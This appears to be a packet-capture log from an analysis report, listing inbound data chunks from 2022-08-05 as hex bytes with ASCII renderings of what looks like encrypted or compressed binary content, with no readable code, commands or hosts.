2022-08-05 09:32:58 UTC	35	IN	Data Raw: aa c5 58 b5 58 cb 4b 94 93 6d 62 01 5a 7f 94 87 6c 02 cd de 0d f5 52 92 12 cd 97 37 7b 78 52 fa de d6 79 cf 30 89 64 f3 d2 1f 83 bf e3 e3 e1 9a 2e 3c 96 e6 ee 20 a5 16 15 ee 27 ec 32 be 1d 42 c7 80 b8 3f be 65 e6 dc 99 b0 70 72 b7 84 95 67 53 65 77 8b a2 fe 13 23 a6 2b 1a b7 7a d5 2d ed a1 33 cb df 37 c3 27 12 f9 b8 93 a6 50 2e 2a fa e1 ad ce 64 89 0d 21 6b d7 70 90 5f 3e ff 03 fa 79 ad 78 6d 57 6f e0 68 35 98 46 00 f8 bc 64 e1 7e 31 77 62 1c 42 02 93 b5 ca 7e 5a 2a 7a c9 f9 dd 31 d9 e2 fd 66 e6 dc 13 6a 1f 4a 79 de 42 10 e5 4b d9 ce 07 66 4b bf c0 dd 89 78 0c 15 63 64 80 f9 23 57 a2 8f 27 cd f9 87 ba 50 13 05 44 4f 38 4c d8 50 8e 33 f2 bd e3 7d 88 15 c3 c8 37 0a fc 81 ee b5 2f cc 52 8c 61 78 37 40 65 ec d8 a9 3d 0f ff f1 50 8a 1e ab b3 c4 a0 24 8c b2 25 Data Ascii: XXKmbZlR7{xRy0d.< '2B?eprgSew#+z-37'P.d!kp_>yxmWoh5Fd~1wbB~Zz1fjJyBKfKxcd#W'PDO8LP3}7/Rax7@e=P$%
2022-08-05 09:32:58 UTC	36	IN	Data Raw: 47 0f 43 a2 01 20 56 8a 54 23 2a 91 d2 cf a4 56 15 bf 76 ac ac f4 49 24 78 b6 97 f2 82 da e1 f5 ac d5 58 af b9 83 0d 60 57 6a f1 06 e6 14 eb 69 b2 50 9c a2 87 f1 0e fc 32 33 dd 02 5a be e0 84 ea 3c ae cb 99 b9 f7 c7 de 8a 41 94 2b 31 f5 f4 fe 86 5f a3 7e aa 79 28 ed 7f b1 e2 af 6f 10 92 8c 54 b6 6d 33 39 fc e7 da a8 36 1d d1 66 55 38 2b 50 5e e2 65 2f 17 9c 9e d9 41 ab 41 b1 8a f6 17 6e 6e 1f 5a 38 a9 86 cc e4 5f 06 7d dc c7 97 a7 54 d5 88 df 39 e6 8d 14 2f 69 0c 5b 86 86 f9 e9 3e 75 ad 4c 08 54 8e 1d dd d2 41 ad 30 49 7b f1 e2 9a bb 71 4a 7b 81 1d 6c 74 fb 94 ce a9 57 f1 72 44 d6 ab fb fe 7a 07 ee 24 7c cb 20 dc 1c a0 f7 d8 0d e0 a6 59 b3 78 d0 5b c7 0d ce a3 89 01 44 85 cc 72 35 56 31 f1 b0 52 a2 2d ea 25 5c 54 38 08 61 bd c3 53 e7 c8 7c 82 de 64 cd 13 Data Ascii: GC VT#*VvI$xX`WjiP23Z<A+1_~y(oTm396fU8+P^e/AAnnZ8_}T9/i[>uLTA0I{qJ{ltWrDz$\| Yx[Dr5V1R-%\T8aS\|d
2022-08-05 09:32:58 UTC	37	IN	Data Raw: 68 de 85 e4 9e 62 bc 23 02 d6 6b 7c 54 36 97 fe b4 14 6a 10 c9 55 84 60 da a0 c8 8f b8 56 b7 0e d8 49 b6 fd 81 1b 21 4a 42 b4 82 d4 31 ef e7 6d 40 47 db d6 28 27 c5 0a 9b 96 f0 d5 3c 6c 97 47 fd 29 df bd 4e 7d 0c 33 d3 d8 33 8d 52 73 33 d4 87 2a ea 52 f1 e5 b4 44 ea c8 72 24 1c 35 37 c1 54 75 2c f4 d5 88 e4 4e fb 3f 00 9d 0d 50 fc 55 d7 8f 8f 15 b7 06 f5 5c f5 b4 7a 11 5c 28 a7 0f 8b af a7 f2 6d c6 03 39 6a f4 1b de 6c 9b 72 9f 74 bd 48 e1 0c c5 16 19 1d cf a2 c7 a3 a5 d8 cb ec 84 c4 a7 7d 58 76 ed d7 56 07 53 1e 31 ba ba 1b 85 d7 bf b2 81 3f 80 e9 34 f4 a0 50 c1 e7 3e f1 33 1a e4 e7 dd a6 53 14 7c da 2b 7d c4 17 63 2e 50 dd fb d0 95 0e 67 3d 19 61 12 22 9b ba af 12 97 dc 37 d0 e0 a2 95 d0 d0 fc 52 e4 76 dd f7 7f a3 38 05 9a d8 1a d0 92 b1 d1 6c 8b 0e d4 Data Ascii: hb#k\|T6jU`VI!JB1m@G('<lG)N}33Rs3*RDr$57Tu,N?PU\z\(m9jlrtH}XvVS1?4P>3S\|+}c.Pg=a"7Rv8l
2022-08-05 09:32:58 UTC	39	IN	Data Raw: ae 61 6c ad 44 73 1f 4f 10 fb 98 fb a2 2d e0 05 58 47 21 03 3c ee 6b 4d cf 33 7e 94 da fc f6 5c 0a 2a 1d 45 30 9d 1b 57 51 d1 a6 16 d2 89 c8 cc a0 d0 6f 6b 38 2d 97 91 d6 fd 5e 84 2d 1e 26 8a 69 69 48 4a c5 9e 9e b8 b9 f4 fa 7a 7f 90 ad af d1 b4 de 0b 88 59 7c 12 cc e6 04 4b 7f 53 cb cd e6 7b 99 26 89 75 e4 93 09 84 bb db 89 c1 6c 32 0e 70 cb e4 00 99 12 47 ef 21 c0 60 9f ec 64 f7 5e b8 2c 9d 57 e4 c9 b9 b0 70 0e bc 84 84 74 5b 20 5b 5b ba ce c1 2a 80 3f 0c 40 df d5 2d e8 a3 6b e1 2a 31 ba 07 09 c9 bf e2 d7 55 2e 2b ad f2 9d dd 1a dd 0d 21 6f c6 5d 9a 68 0f f7 06 a3 67 85 8d 46 53 7a fc cf e6 e6 35 01 d0 eb 67 8e 0a 49 57 68 62 30 73 b3 b1 c9 10 03 38 4a c1 87 8e 31 d9 e6 f2 09 95 cc 33 5d 37 8b 6c de dd 11 e5 47 e3 4f 59 15 4b be ec 98 e7 0a 0b 6c 49 4f Data Ascii: alDsO-XG!<kM3~\E0WQok8-^-&iiHJzY\|KS{&ul2pG!`d^,Wpt[ [[?@-k*1U.+!o]hgFSz5gIWhb0s8J13]7lGOYKlIO
2022-08-05 09:32:58 UTC	40	IN	Data Raw: 94 e5 97 cb 74 fa e0 dd 93 c9 fd 5b 74 e7 60 d3 de 41 87 1e 07 64 ec ab d1 96 c5 dd 68 89 1c dc e5 6c a1 cf bc e4 59 13 54 9a 98 b9 db 96 42 56 76 e5 a4 4a 3d c0 51 c6 78 b6 0f de 79 19 ca 3b a5 50 a7 0d 30 79 c2 92 ad 9d b7 98 ff 8d 7d 20 e3 23 39 bf f1 66 cc 1e b7 24 f3 88 ae 8a d8 b8 f7 58 22 18 82 47 0a 3c 6e f7 1e 9b 48 25 69 b6 41 ad fa 09 fa 25 1c 29 12 03 0b 52 af ce 0c 70 2d 89 db 17 b8 fd e7 c9 ec 9d ec 2b 3b d5 8a 91 b6 58 a7 7b 21 78 28 60 73 cf 87 87 37 15 84 e0 20 17 59 15 24 c3 90 66 bf 20 8b ba 3c 78 1e 39 4e 68 11 e4 87 78 4e 88 cd 38 15 3e c2 80 ef 3e 74 27 62 34 8e a2 f8 b2 f2 58 6d a5 56 c6 9d a4 70 f2 fd df 3f e8 45 55 4d ce c4 57 a7 5f f8 1c d7 41 8f 28 82 54 84 04 05 c5 6f f5 7c 68 ea f3 ca 65 b9 71 4c 53 23 1d 6c 72 dc 9b e6 c8 10 Data Ascii: t[t`AdhlYTBVvJ=Qxy;P0y} #9f$X"G<nH%iA%)Rp-+;X{!x(`s7 Y$f <x9NhxN8>>t'b4XmVp?EUMW_A(To\|heqLS#lr
2022-08-05 09:32:58 UTC	41	IN	Data Raw: 9e 38 d9 f3 f9 09 95 dd 13 60 1a 59 5a b7 22 11 ef 43 f6 d9 54 16 6d 99 ee b6 6f 0a 0d 11 42 b7 9c 87 50 4d 8a 0c 30 a2 8d ac ba 40 45 fe 44 4f 3a 69 db 62 75 b8 f2 b7 8a 23 89 0f e1 4a 33 33 d8 af ee af 11 7b 56 02 d0 45 6e 4a 78 e5 fe 3e 10 05 d9 4b 55 8e 0f a9 88 89 8b d7 95 b5 19 c8 1a ad db a7 1d 6e 7c bd b4 88 bf 6d 89 c1 4f 2d ae db d6 82 0f 7d 26 f9 ba c7 da 90 52 97 e7 fc 3b 24 bd 4e 73 25 0a 69 a4 33 8d 2b ac 42 d4 83 2c a5 86 ef e5 be 4a e9 c9 72 2a 71 1d 76 c1 5e 01 76 a6 d5 8c 81 91 40 3f 0a e7 7d 47 81 f8 b8 2c 8a 17 95 8b 82 a0 00 41 7a 13 dc 4b ef 0f 8f c1 ad a7 6d cc 74 c1 c0 f4 1f d2 4c 98 9b 9f 74 bd 0c d4 70 58 1c 67 68 e4 37 be 52 00 d9 cf cd c3 cc b6 66 40 ff ed 32 5c db 55 b6 38 d5 ea 05 ad 96 bd b2 8b 3d 8a fc 0e 4d 67 54 c1 c1 fc Data Ascii: 8`YZ"CTmoBPM0@EDO:ibu#J33{VEnJx>KUn\|mO-}&R;$Ns%i3+B,Jr*qv^v@?}G,AzKmtLtpXgh7Rf@2\U8=MgT
2022-08-05 09:32:58 UTC	43	IN	Data Raw: 1f c9 64 a7 62 f1 20 8e 17 0b ae 69 ba f5 46 3a eb ce 8a 99 83 7a ab 89 35 93 74 ca 97 bd dd 10 f4 78 3e dc a8 e3 d3 79 21 c8 0e 1a 66 27 dc f6 8f 0f d8 60 d0 a5 48 c2 08 d0 5b cf 14 e3 a3 ad 0a 54 80 43 54 4e c2 20 f9 9c f1 84 06 17 0e 5b 77 39 23 ae c3 bb 53 e7 cc 7e 94 df fd 55 6c 2a 9b 2c bd 7d b4 e4 51 28 f7 d5 62 d3 f8 e2 b6 a2 d2 5b 55 0b 09 b1 9b ab 63 5e 8f 29 35 cf aa dc 74 9b 54 e2 61 9e b8 b4 e2 76 4b 7d 87 b0 aa 85 93 a5 92 f1 79 78 38 eb bc d3 4b 7c 62 e8 de d9 79 99 30 89 75 e4 c4 0b 87 bd d6 cd ca 9a 06 5b 10 cb e4 02 a6 c2 14 fd 11 c5 14 9a ec 64 ec 78 b8 2c 9f 65 fd de b4 b7 56 75 17 84 84 61 51 6e 5d 7c a4 e5 0e 23 80 1e 1b cc ff d5 2d e9 8b 3b c0 22 7b c2 27 26 d9 9e c6 c7 85 30 02 78 e1 ad d9 69 89 0d 21 65 b7 5f 99 64 02 f6 0d 55 53 Data Ascii: db iF:z5tx>y!f'`H[TCTN [w9#S~Ul*,}Q(b[Uc^)5tTavK}yx8K\|by0u[dx,eVuaQn]\|#-;"{'&0xi!e_dUS
2022-08-05 09:32:58 UTC	44	IN	Data Raw: e4 21 60 b6 75 74 d0 e6 d5 27 77 55 34 3c 5b 4c 11 b6 c6 bf b1 95 50 39 e8 34 f2 7c 79 c2 c1 f1 c1 39 31 17 e5 a6 0a 53 14 78 c4 1d 48 e6 01 0c 07 4c ce 80 fb 6d 0e 60 4f 92 6a 10 25 9f ae 1b 13 97 de 4e fb 6e 15 85 fa f6 d4 63 bf 7c c8 cb 65 0b a9 35 05 c2 94 67 80 fc d6 6f a3 dd fd fc 67 cc 17 af e6 7b d4 7f 96 9d 87 22 91 3c 23 19 3d af 60 23 dd 7e dd 5a b8 63 51 6e 05 e1 f6 aa 67 8a 47 22 7a e0 50 af e6 2a 8e cc a0 45 22 f8 0d f3 a5 e5 48 24 1f ab 5a f3 88 a2 90 9a 0f d0 50 27 26 f5 54 0f 24 b5 f1 26 37 61 fb 69 b6 47 8b d1 0a 65 9b f6 08 7c cc 0b 53 b2 d8 0f 5d b3 f7 a4 17 2d f7 cd de 81 55 40 2b 31 fb a6 8f 5b d5 a7 11 21 7d 31 ca 7b e9 80 b9 43 12 a2 cd 04 37 47 c5 3f fc 1b db b6 ba 9d 82 1d 73 3e 40 6d 48 ea e1 80 4b 63 b5 da 41 8b cd c0 f1 62 13 Data Ascii: !`ut'wU4<[LP94\|y91SxHLm`Oj%Nnc\|e5gog{"<#=`#~ZcQngG"zP*E"H$ZP'&T$&7aiGe\|S]-U@+1[!}1{C7G?s>@mHKcAb
2022-08-05 09:32:58 UTC	45	IN	Data Raw: 32 8f 96 36 c3 21 0b b2 0c 93 f7 51 2c 51 32 e1 ad db 94 4a 3e 07 78 d1 70 95 5f 2d 8e b2 73 79 a9 61 43 42 79 c6 56 ed e5 3f 2b 17 a9 63 8c 0e 4b c2 68 62 35 8c 24 de 78 10 29 2d 78 b8 3d ae 31 dd f5 ff 18 93 f5 9b 60 1a 51 63 f0 0a 98 e5 41 ff c1 02 ae 4b bf c0 a4 03 0b 0d 1f 7f 7c ae 81 7c 78 a0 9d 4d 1b 8b 86 be 58 11 c3 44 4f 38 55 f3 7e 5d 33 d9 b5 f7 bb 89 15 cd c4 48 93 de 85 ea 87 3c ea b1 03 d6 65 6c 4f 35 54 fe b4 14 db c9 cb 3a 2c 1f ab a6 16 83 c6 99 9f 84 d2 37 cd 21 5f 4f 4c f8 d9 b4 88 ae 53 e8 f6 6e 03 9d ca d1 20 0b 0a ea 9a 9c eb ab 58 53 97 4d 93 8a 85 bd 48 75 48 89 ac ad 35 53 7f 28 6a 98 87 2e 8f cd f2 9e 25 37 4b cd 61 29 62 69 1b c8 4f 0c 5c f3 ba 40 8a ec fc 3d 65 40 7e 50 fa 79 d9 2c 8e 1f 63 46 a9 9a 0a 0a 5c 13 22 5f a7 0f 8f Data Ascii: 26!Q,Q2J>xp_-syaCByV?+cKhb5$x)-x=1`QcAK\|\|xMXDO8U~]3H<elO5T:,7!_OLSn XSMHuH5S(j.%7Ka)biO\@=e@~Py,cF\"_
2022-08-05 09:32:58 UTC	46	IN	Data Raw: 3b 3a 7d 31 5c 58 e2 d2 b8 0d 80 85 13 2e 9f 2f 58 4c f7 c6 bb 5e 44 e5 71 4b a0 3b d8 a7 ea 35 6b 17 7e 76 21 85 de ba f2 22 aa 12 57 c2 95 d6 f5 ab fc db 15 c3 b0 73 4a ce d6 50 a7 6c 8e 90 36 64 a3 4f 60 56 f5 ba 01 d4 6f ba 8a 46 3a e7 e0 8e c4 dc 4a 7b 93 1f 17 da ca 91 ca 85 02 f6 09 ea de ab ff 91 a4 06 ee 2e 65 ef 5a 72 f2 a4 f3 da 08 4f a6 48 c9 24 c2 59 b8 bb e3 b2 ab 7f 92 ac 44 78 37 48 5d 56 98 db a6 2f 9b be 58 47 34 0f 9f c1 c0 e3 e7 cc 7a fb 02 eb 7a 76 08 3e 61 dd 63 9c 1f 53 53 4a a6 16 d7 d4 fa ce db 6a 45 78 0c 40 66 b0 d6 f7 5c 9b 50 a5 37 aa cb 46 8e 29 5f 61 9e bc bd f4 0b eb 7f 90 a8 85 96 c8 68 0d f1 7d 7e 06 b0 23 24 4b 7b 50 f5 a3 63 79 99 34 8b 61 99 73 09 84 ae f9 d8 91 04 2c 26 8b c9 f2 7b 34 3a 14 ea 27 ea 00 97 97 f1 ec 74 Data Ascii: ;:}1\X./XL^DqK;5k~v!"WsJPl6dO`VoF:J{.eZrOH$YDx7H]V/XG4zzv>acSSJjEx@f\P7F)_ah}~#$K{Pcy4as,&{4:'t
2022-08-05 09:32:58 UTC	48	IN	Data Raw: 03 93 c2 32 c1 34 4f 25 90 d1 47 9c a4 af 7f b6 a7 ef 39 e3 0a 1d 94 59 35 f0 bd 6e c1 0e 08 72 72 4a c7 0e 18 33 03 c9 6d a7 e4 c5 a5 b9 39 ae e5 ab 8d eb 7f 2a 2a d3 6c 42 ca 4d 86 35 c1 44 03 76 f3 57 26 9e 51 77 94 3c 83 7c 9c 2b 29 a5 f3 75 7d 64 93 39 d0 56 97 94 aa 85 38 a6 05 7a e5 7f e0 fc 2f b2 1e ab df c3 4e b6 45 7c 47 53 0b ba e5 70 15 3d 53 3e 45 de b1 5e 54 53 f9 71 75 bb fc 22 94 7a e3 42 86 ff 46 7c ed 54 e8 01 c8 a1 a4 bf 97 40 92 bd 9b e6 d0 bb 6e c3 d0 70 25 54 3a 49 a8 64 fd c8 d3 10 56 dc 9a 95 fe f4 64 f3 ae d9 cd 05 93 51 b6 72 23 ba 44 21 4b fd 75 a3 bf 61 07 fc 39 77 34 8e e8 1f 38 00 a9 b6 28 0e b8 f2 85 88 8e 1e af fd 25 dd 90 7f 8b cb c3 93 5b 2a 86 e7 7f a5 05 1e 2c 54 ca 03 e3 aa 4f b4 b5 c9 12 6a 5a 2f f9 75 8c 2e 58 7e 91 Data Ascii: 24O%G9Y5nrrJ3m9*lBM5DvW&Qw<\|+)u}d9V8z/NE\|GSp=S>E^TSqu"zBF\|T@np%T:IdVdQr#D!Kua9w48(%[,TOjZ/u.X~
2022-08-05 09:32:58 UTC	49	IN	Data Raw: 53 c9 39 c5 e1 75 69 6a 3a 8b 03 cd f1 1a bd 05 0f ca e0 c0 c5 85 b7 8a 15 88 07 c0 b4 29 81 ef 9f 52 ed d9 f1 05 73 a1 0b eb 90 f9 8d 4b 33 f7 d5 0b 10 f0 3b 6b 50 93 d0 d0 9f d9 90 18 c1 7e df ce 42 65 e4 00 81 01 30 64 59 dd 6d eb 52 0e 3c b3 3d 9f 73 01 95 98 86 65 52 bd 94 d0 99 57 72 d4 95 04 6d 80 e2 60 25 f7 fb 9e c7 6f 80 a9 ca e0 07 79 bd 30 72 5a 88 94 9f d4 b0 e2 97 74 56 04 5c 1b 65 71 b6 0c b1 55 3c be 9d b2 ad 90 5b e9 c1 58 e6 be 7f 6e 2c 1a 85 26 88 3b 09 b7 74 62 5b 3c 7b 1d 28 7d 21 0e d1 bc 81 5c 46 98 05 ff 80 68 93 20 e8 83 4d 6e 81 a3 b2 78 61 26 ce 38 2a 68 83 c5 c8 1f 94 ef be d4 30 88 08 7a 37 25 c0 c5 a1 08 49 16 ee d2 77 fc b1 71 41 80 b3 0a 33 8f 3a b7 ff 37 09 bf 33 83 cd e6 19 81 10 cb e0 d4 c6 18 a0 7e 13 d7 09 46 c0 1b 99 Data Ascii: S9uij:)RsK3;kP~Be0dYmR<=seRWrm`%oy0rZtV\eqU<[Xn,&;tb[<{(}!\Fh Mnxa&8*h0z7%IwqA3:73~F
2022-08-05 09:32:58 UTC	50	IN	Data Raw: 21 1a ed 6b d8 e7 7a 19 3b e5 5a e5 55 00 72 d7 ab 27 26 5b f1 d5 da 5b 88 09 22 7c 5d 03 4e 08 9b 7a 0d aa a7 1f c0 33 be 4f 86 83 f5 bd 73 3e cb 98 a9 6f 52 b2 fb 08 d7 f3 af 2a 29 59 73 66 68 e5 2a c1 15 58 a4 95 f6 48 8a 55 c1 86 0a 7e 12 51 51 82 ad 04 b1 0d fd b3 5f a4 4c ab 4b 8e b4 5d c6 89 15 23 d5 6e 26 61 0d c9 28 65 49 0f 3f f5 e7 b6 b3 bc 22 b8 1e d5 1d 43 d8 28 6e 85 fe 30 85 ff f9 c7 24 de c4 8e e8 60 b9 cd 49 13 3b e4 c3 de 66 fa ae c8 d4 fb 1c 08 04 16 c3 49 41 da e8 13 db cd 4f 38 73 da 66 b3 1a 39 75 7f d6 0e 6a de 2b b7 40 3f 52 fb ab 39 64 27 de a9 81 af 36 2b 93 72 01 4e f5 f1 fd c3 94 cc 6f c3 b7 de 1b 72 93 ee ff c5 47 01 2c 14 e8 01 51 5d ac 30 5e 65 e3 e5 cb 4a 86 f2 39 f5 0a a3 77 34 ca 69 ee 83 55 b0 e3 6f af e7 fb 16 bf 4a 2c Data Ascii: !kz;ZUr'&[["\|]Nz3Os>oR)YsfhXHU~QQ_LK]#n&a(eI?"C(n0$`I;fIAO8sf9uj+@?R9d'6+rNorG,Q]0^eJ9w4iUoJ,
2022-08-05 09:32:58 UTC	51	IN	Data Raw: 9a 33 88 da 21 0c 3c d9 66 ae a7 41 1c d0 38 83 f4 d5 42 c5 6a f4 57 f4 dd eb c3 fd 01 b8 07 e0 67 e8 81 12 a0 1c 97 9c e2 f1 73 8f fe e3 e6 26 b2 39 93 10 28 56 53 63 d3 ec 6e f3 73 e5 3a 7b 3c 7b db f3 60 70 c8 aa f3 7a 69 0e 04 20 a8 9b 00 d8 bc 0e 5d 81 a0 a7 8c 8a 02 f1 e4 a8 1b 2b 60 fd 81 ab 8c 31 39 33 a3 9b 62 bb c8 ec fa c5 07 d2 27 7d bc c2 2f ab 27 53 9c 2e 9d d4 b5 f0 ae 1a 49 57 a3 89 f5 34 8e 99 8a af dc 87 ca 38 f9 3d cb b2 4e 29 fe 57 f9 78 c2 11 9a 1c 5f d0 e0 34 c6 bf e9 ff 9b 7d d4 12 fb 29 85 25 29 13 fd b6 b6 6a f5 57 1f 79 d3 be 8f e7 fa 4c 30 45 2c 54 be 77 60 41 9d ce c3 1a af 5f fc da 3e a2 3d b9 ba a3 fa cd 66 3f 53 4b d1 67 f5 de 21 71 ae e3 65 a6 45 a1 70 74 92 ac 29 52 4b 0f e5 f7 6e 64 5c 6d 6f ff 7c 21 5d 76 1f ae be 31 8a Data Ascii: 3!<fA8BjWgs&9(VScns:{<{`pzi ]+`193b'}/'S.IW48=N)Wx_4})%)jWyL0E,Tw`A_>=f?SKg!qeEpt)RKnd\mo\|!]v1
2022-08-05 09:32:58 UTC	52	IN	Data Raw: 31 a8 8b 15 bb 1e 6c 7c 44 e4 3d 07 da 72 5d 82 f3 0d 8d 03 89 cd c8 e8 33 39 de 75 ef 9b 39 c4 56 09 d4 7b 6c 5f 48 c2 fc a0 12 13 d9 f9 57 cb 1c bd a0 86 89 8e 9d a1 0e bd 35 9e ff 97 1f 35 81 1b b6 9e aa ca ed 7e 6b 39 8e 68 d4 bb 0d 73 0b 58 9e 78 da a6 52 41 45 65 44 92 bd a7 75 be 28 bb ad c4 8f 13 0f 54 d4 94 2d c0 c4 f6 e5 89 34 12 c9 74 2e 32 6d 6e c1 58 0b 15 f7 8c 8c 8d ec a7 3c 53 e3 79 50 85 52 e1 2c 88 15 c2 45 da a0 0c 4b e5 10 7b 5d a1 0f 15 c3 9b f2 6b cc dc bf 33 f4 19 d6 cf e6 5e 9f 72 b9 89 46 54 c5 1a 67 df cc fb c3 de 00 10 c8 06 59 ca b6 8d 73 f9 e9 4c 5c fb 51 34 38 d3 fb 2c 81 d2 b9 b4 81 06 99 ec 30 f2 67 1c c5 e2 de 5e 33 3a e8 e7 dd b4 53 5b 78 df 34 4b c0 40 05 4d 54 cf 84 a4 91 61 60 54 08 f5 16 58 9c d3 bf bf 93 a6 40 fb e0 Data Ascii: 1l\|D=r]39u9V{l_HW55~k9hsXxRAEeDu(T-4t.2mnX<SyPR,EK{]k3^rFTgYsL\Q48,0g^3:S[x4K@MTa`TX@
2022-08-05 09:32:58 UTC	53	IN	Data Raw: fe b3 06 e7 24 7d fb 26 dd f2 a4 5f d7 73 e0 6f 49 c6 08 f1 5b 43 15 f3 b2 6b 1f 4c ad 8d 73 3b 5c 03 f9 99 da a2 2d e8 1e 58 47 f9 22 83 c3 9f 53 e6 cd 7e 94 f8 fa 7a 7c 87 2b 13 6d 4b 9c 1a 50 28 f1 f2 06 d3 f8 21 cd af d1 69 78 09 2e 97 b1 a6 ed 5e 8f e4 1f 21 aa e2 44 99 55 ed 61 12 a8 bf e2 bf 5b 64 90 94 87 82 b4 ce 0d 4d 69 7c 12 04 96 38 4b 3f 52 e8 df d6 79 75 20 89 75 ed c7 17 84 eb fb ce ed bc 2c 2e 9e cb e4 cf 8c 19 14 af 21 c7 15 95 ec 5c fd 74 b8 e5 8f 44 e6 81 99 b2 71 0e b7 d0 95 65 7b c5 77 a3 a4 b4 3e 2b 81 39 1b 48 ee d5 2d 20 8a 10 e0 7c 37 c3 26 19 c9 0a 82 f7 55 e7 2b ad e1 f0 df 1a fc 0d 21 bf dc 5d 9a b0 2e ba 2b b7 79 a7 73 46 53 90 fb 43 c6 ef 36 4f f8 6e 66 8e 0d 30 77 60 70 31 02 5a b0 9c 11 ff 2b fa c2 97 ae 09 cb e6 f9 c0 94 Data Ascii: $}&_soI[CkLs;\-XG"S~z\|+mKP(!ix.^!DUa[dMi\|8K?Ryu u,.!\tDqe{w>+9H- \|7&U+!].+ysFSC6Onf0w`p1Z+
2022-08-05 09:32:58 UTC	55	IN	Data Raw: a4 42 14 a1 ee 9a 4d d6 17 f8 18 5f dc 95 d0 80 2a 44 44 1e 61 23 13 32 c1 ae 12 f6 ed 60 ff f6 a2 02 fc f7 dc 62 e7 dc f4 fd 63 93 1e da d1 43 1b c6 96 c2 fa eb 8a 1b fc c1 5b 8c cd bf e6 1c e8 5e 9b 98 af 98 c9 97 2a 70 e5 27 39 82 d4 7a de fb e7 a7 cb 69 05 26 71 28 41 a4 0b ff 23 41 5f ab 9d 48 d7 67 a7 47 27 c0 68 36 af f5 4d f3 74 43 97 f3 88 a1 f6 72 ad d7 50 e4 6a 53 54 1e 2e 1e 94 18 9c 71 eb cc d3 5e 8f c0 0a 25 6b f9 20 2b cc 0e 34 b7 ec 1b 5d 1e 91 23 16 a9 f7 a8 a9 8c 2f fc 2b a4 99 0d 8b 97 5f 62 77 a6 79 39 e7 86 a9 b7 ab 6e 14 b5 8e 0f 3e 6d 33 52 bf ec d3 b8 26 f0 c5 96 54 39 2f 21 22 ba ef 99 78 ef f4 5e 4a a6 3f f3 e6 71 12 6f 01 0a 37 fc a3 fe b8 41 30 c6 12 51 c6 56 c2 9c ab ed df e4 8d ed 7a 51 e5 f4 34 fa 8a e2 37 23 14 d1 60 83 54 Data Ascii: BM_DDa#2`bcC[^p'9zi&q(A#A_HgG'h6MtCrPjST.q^%k +4]#/+_bwy9n>m3R&T9/!"x^J?qo7A0QVzQ47#`T
2022-08-05 09:32:58 UTC	56	IN	Data Raw: 5c 72 e6 38 00 c0 92 66 8e 0c 30 61 68 ff 2e b8 93 bf c9 7d 03 2b 7a c3 87 b8 31 30 f9 bd 09 9a dd 97 4a 1a 5b 72 f6 24 09 16 5b 92 c3 76 15 eb 95 c4 cb e6 0a 0b 15 04 6f 57 87 5f 57 7a a1 30 a2 8b 86 2c 5a b0 56 91 4f 2e 43 b7 53 5d 33 f2 b7 8a 11 7a 0f 17 c6 27 33 4e ae ee b5 39 c2 30 09 47 4e 8a 59 5d e6 5a 9f 10 05 d9 c9 33 85 81 8a 44 c8 9e d7 27 9c 0e d2 37 c7 9b 8a ad 6f 6a 42 a1 88 aa 40 ef e7 6a 2f 88 c3 25 38 e1 65 1e 9b 9c e1 d8 b0 51 97 01 ff b8 a5 49 4e 60 27 2a ad ad 33 8e 56 4b 41 52 a5 d0 85 dc f0 e5 be 37 4b ca 72 68 70 ae 15 c4 5f 10 5e 38 fe 8c 8b ec fa 39 12 10 65 37 fc 4d b8 c4 a5 15 bd 46 83 a6 12 b8 72 0c 23 41 a7 17 a3 c0 c2 f2 6d ca 7e d7 4e f1 1e c8 66 b1 2b 9f 74 b9 27 43 0d 72 38 62 6d d0 a2 53 e0 00 d9 cb e6 5c cc b5 50 17 fc Data Ascii: \r8f0ah.}+z10J[r$[voW_Wz0,ZVO.CS]3z'3N90GNY]Z3D'7ojB@j/%8eQIN`'*3VKAR7Krhp_^89e7MFr#Am~Nf+t'Cr8bmS\P
2022-08-05 09:32:58 UTC	57	IN	Data Raw: f8 e2 e4 77 49 12 57 c6 97 bc 58 da c1 9b 39 b8 9b 26 0b e5 0d 5b 8c 9f f3 82 0b 58 a5 3e 82 fc c5 17 01 d4 6b c4 7a 96 07 d1 e0 c0 b9 ad 01 7b 97 1d 6c 65 ca 7c f3 f1 12 ae 72 60 92 ab fb fe 7a 16 ee 2d 59 a5 25 86 f2 3c bb d8 73 e0 a6 59 cd 61 ee 3e c1 4f e3 86 e2 10 4c ad 44 63 35 95 1e 95 9a 87 a2 91 ad 0e 58 47 30 32 8d 26 85 23 e5 90 7e b0 92 ea 7a 7c 0a 3b 1c 5c 5c ec 19 0c 28 a9 e8 16 d3 f8 e8 da a0 ac 7a 0d 0a 71 97 bd 99 fd 5e 8f 2d 08 37 33 f0 fe 98 0a ed d5 d1 b8 bf e2 76 4c 7f 69 93 c3 82 ea de d5 be 79 7c 12 cd 81 24 62 3f 16 e1 81 d6 91 d6 30 89 75 e4 d2 09 dd ea bf ce b3 bc d0 69 8f cb e4 06 9c 3a 9d ae 65 c6 4b 95 a8 34 ec 74 b8 2c 98 67 43 89 dd b0 2f 0e c3 d4 84 65 7b 48 60 8b 71 a6 7a 2a df 39 b3 9c ff d5 2d e9 9a 38 e5 6b 4c c1 78 09 Data Ascii: wIWX9&[X>kz{le\|r`z-Y%<sYa>OLDc5XG02&#~z\|;\\(zq^-73vLiy\|$b?0ui:eK4t,gC/e{H`qz*9-8kLx
2022-08-05 09:32:58 UTC	59	IN	Data Raw: bc 0a 99 1f d6 66 e5 11 9f 79 e2 93 45 d4 c5 d4 0a 6c cf a2 c3 da 00 80 90 52 5a 16 b6 61 1e fc ed d7 5c cd 55 91 63 61 fb dc 85 bb d3 b2 81 3f 9d ff 34 f1 3b e0 c1 3b da 3d 5d 1a ec e7 dd b0 53 45 20 74 33 90 c0 37 6e 2c 50 dd 84 c6 95 a6 38 f0 0b be 12 4a f7 c1 bf 12 97 ce 44 a4 bd 62 90 2a fd 65 1b e7 71 c1 da 77 85 37 59 2f c7 f2 d0 6a a0 cc 6c 8b 0a ea fc ac fd 1b ad 0d 71 9e 24 9a 9e af f5 86 3c 5c 29 3a ad 8f 29 53 0c de 5e be 0c 59 77 0d fd 6c 83 b1 a2 af 52 7a ea 54 ad 0e b1 d7 ac 4a 55 d4 e9 a4 ad ac f4 45 26 86 c4 e3 92 b4 a6 61 f5 14 a3 50 21 06 94 c5 0f 8b 0b cd 0e 6b 60 df 1a b6 47 8b d1 9b f0 db 96 d3 39 3f 0b 02 da e8 0a 5d 2b 71 bc e4 a2 90 cd 3b 83 42 9e 2b 31 f7 8a 19 86 6a c6 e8 22 8c 28 07 00 cf 96 af 6f 92 9c 15 21 5d 6c c7 33 2b 90 Data Ascii: fyElRZa\Uca?4;;=]SE 